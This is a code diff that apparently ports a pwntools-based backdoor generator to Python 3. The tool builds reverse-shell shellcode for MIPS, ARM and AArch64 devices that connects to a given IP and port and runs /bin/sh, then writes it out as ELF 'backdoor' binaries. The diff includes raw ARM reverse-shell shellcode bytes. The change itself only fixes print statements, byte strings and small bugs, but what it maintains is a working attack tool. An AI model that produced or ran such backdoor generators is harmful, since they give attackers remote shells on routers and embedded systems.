@@ -31,7 +31,7 @@ def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		print "mipsel_backdoor is ok in current path ./"
+		print("mipsel_backdoor is ok in current path ./")
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -64,7 +64,7 @@ def aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 		f.write(data)
 		f.close()
 		#print disasm(all_reverseshell)
-		print "backdoor_aarch64 is ok in current path ./"
+		print("backdoor_aarch64 is ok in current path ./")
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -141,14 +141,14 @@ def aarch64_reverse_sl(reverse_ip,reverse_port):
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%shellcode.index("\x00"))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
 		return shellcode
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -183,7 +183,7 @@ def armelv7_backdoor(reverse_ip,reverse_port,filename=None):
 		f.write(data)
 		f.close()
 		#print disasm(all_reverseshell)
-		print "backdoor_armelv7 is ok in current path ./"
+		print("backdoor_armelv7 is ok in current path ./")
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -261,7 +261,7 @@ def armelv7_reverse_sl(reverse_ip,reverse_port):
 	svc #1
 	'''
 	handle_ip=reverse_ip.split('.')
-	handle_port=list(p16(reverse_port)[::-1])
+	handle_port=list(str(p16(reverse_port)[::-1],encoding="utf-8"))
 	for i in range(len(handle_ip)):
 		if handle_ip[i]!="0":
 			handle_ip[i]="mov r7,#"+handle_ip[i]
@@ -285,7 +285,7 @@ def armelv7_reverse_sl(reverse_ip,reverse_port):
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		#print shellcode.index("\x00")
 		log.info("the null byte in %d"%(shellcode.index("\x00")))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -293,20 +293,20 @@ def armelv7_reverse_sl(reverse_ip,reverse_port):
 
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		print(shellcode_hex)
 		return shellcode
 
 
 def armelv5_backdoor(reverse_ip,reverse_port,filename=None):
-	context.bit="32"
+	context.bits="32"
 	context.arch='arm'
 	context.endian='little'
-	shellcode  = '\x01\x30\x8F\xE2\x13\xFF\x2F\xE1\x02\x20\x01\x21\x52\x40\x64\x27'
-	shellcode += '\xB5\x37\x01\xDF\x04\x1C\x0D\xA1\x4A\x70\x10\x22\x02\x37\x01\xDF'
-	shellcode += '\x20\x1C\x49\x40\x3F\x27\x01\xDF\x20\x1C\x01\x31\x01\xDF\x20\x1C'
-	shellcode += '\x01\x31\x01\xDF\x03\xA0\x52\x40\xC2\x71\x05\xB4\x69\x46\x0B\x27'
-	shellcode += '\x01\xDF\x7F\x40\x2F\x62\x69\x6E\x2F\x73\x68\x41\x02\xAA\x11\x5C'
-	shellcode += '\x14\x14\x0B\x0D'
+	shellcode  = b'\x01\x30\x8F\xE2\x13\xFF\x2F\xE1\x02\x20\x01\x21\x52\x40\x64\x27'
+	shellcode += b'\xB5\x37\x01\xDF\x04\x1C\x0D\xA1\x4A\x70\x10\x22\x02\x37\x01\xDF'
+	shellcode += b'\x20\x1C\x49\x40\x3F\x27\x01\xDF\x20\x1C\x01\x31\x01\xDF\x20\x1C'
+	shellcode += b'\x01\x31\x01\xDF\x03\xA0\x52\x40\xC2\x71\x05\xB4\x69\x46\x0B\x27'
+	shellcode += b'\x01\xDF\x7F\x40\x2F\x62\x69\x6E\x2F\x73\x68\x41\x02\xAA\x11\x5C'
+	shellcode += b'\x14\x14\x0B\x0D'
 	data = make_elf(shellcode)
 	if filename==None:
 		filename="backdoor_armelv5"
@@ -314,7 +314,7 @@ def armelv5_backdoor(reverse_ip,reverse_port,filename=None):
 		f.write(data)
 		f.close()
 		#print disasm(all_reverseshell)
-		print "backdoor_armelv5 is ok in current path ./"
+		print("backdoor_armelv5 is ok in current path ./")
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -392,7 +392,7 @@ def armelv5_reverse_sl(reverse_ip,reverse_port):
 	svc #1
 	'''
 	handle_ip=reverse_ip.split('.')
-	handle_port=list(p16(reverse_port)[::-1])
+	handle_port=list(str(p16(reverse_port)[::-1],encoding="utf-8"))
 	for i in range(len(handle_ip)):
 		if handle_ip[i]!="0":
 			handle_ip[i]="mov r7,#"+handle_ip[i]
@@ -415,14 +415,14 @@ def armelv5_reverse_sl(reverse_ip,reverse_port):
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%(shellcode.index("\x00")))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
 		return shellcode
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -501,7 +501,7 @@ def armebv7_reverse_sl(reverse_ip,reverse_port):
 	svc #1
 	'''
 	handle_ip=reverse_ip.split('.')[::-1]
-	handle_port=list(p16(reverse_port))
+	handle_port=list(str(p16(reverse_port),encoding="utf-8"))
 	for i in range(len(handle_ip)):
 		if handle_ip[i]!="0":
 			handle_ip[i]="mov r7,#"+handle_ip[i]
@@ -524,14 +524,14 @@ def armebv7_reverse_sl(reverse_ip,reverse_port):
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.success("the null byte in %d"%shellcode.index("\x00"))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
 		return shellcode
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -610,7 +610,7 @@ def armebv5_reverse_sl(reverse_ip,reverse_port):
 	svc #1
 	'''
 	handle_ip=reverse_ip.split('.')[::-1]
-	handle_port=list(p16(reverse_port))
+	handle_port=list(str(p16(reverse_port),encoding="utf-8"))
 	for i in range(len(handle_ip)):
 		if handle_ip[i]!="0":
 			handle_ip[i]="mov r7,#"+handle_ip[i]
@@ -633,14 +633,14 @@ def armebv5_reverse_sl(reverse_ip,reverse_port):
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%shellcode.index("\x00"))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
 		return shellcode
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -674,14 +674,14 @@ def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
 		f.write(data)
 		f.close()
 		#print disasm(all_reverseshell)
-		print "backdoor_armv7 is ok in current path ./"
+		print("backdoor_armv7 is ok in current path ./")
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
 
 
 def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
-	context.bit="32"
+	context.bits="32"
 	context.arch='arm'
 	context.endian='big'
 	basic_shellcode=asm(shellcraft.connect(reverse_ip,reverse_port))
@@ -708,7 +708,7 @@ def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
 		f.write(data)
 		f.close()
 		#print disasm(all_reverseshell)
-		print "backdoor_armebv5 is ok in current path ./"
+		print("backdoor_armebv5 is ok in current path ./")
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -743,7 +743,7 @@ def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		print "mipsel_backdoor is ok in current path ./"
+		print("mipsel_backdoor is ok in current path ./")
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -775,7 +775,7 @@ def mips_backdoor(reverse_ip,reverse_port,filename=None):
 		f=open(filename,"wb")
 		f.write(ELF_data)
 		f.close()
-		print "mips_backdoor is ok in current path ./"
+		print("mips_backdoor is ok in current path ./")
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -808,14 +808,14 @@ def mipsel_reverse_sl(reverse_ip,reverse_port):
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%(shellcode.index(shellcode)))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
 		return data_shellcode
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -823,7 +823,7 @@ def mipsel_reverse_sl(reverse_ip,reverse_port):
 
 def mips_reverse_sl(reverse_ip,reverse_port):
 	context.arch='mips'
-	context.bit="32"
+	context.bits="32"
 	context.endian='big'
 	shellcode_connect=asm(shellcraft.connect(reverse_ip,reverse_port))
 	shellcode_dump_sh='''
@@ -848,14 +848,14 @@ def mips_reverse_sl(reverse_ip,reverse_port):
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%(shellcode.index(shellcode)))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
 		return data_shellcode
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
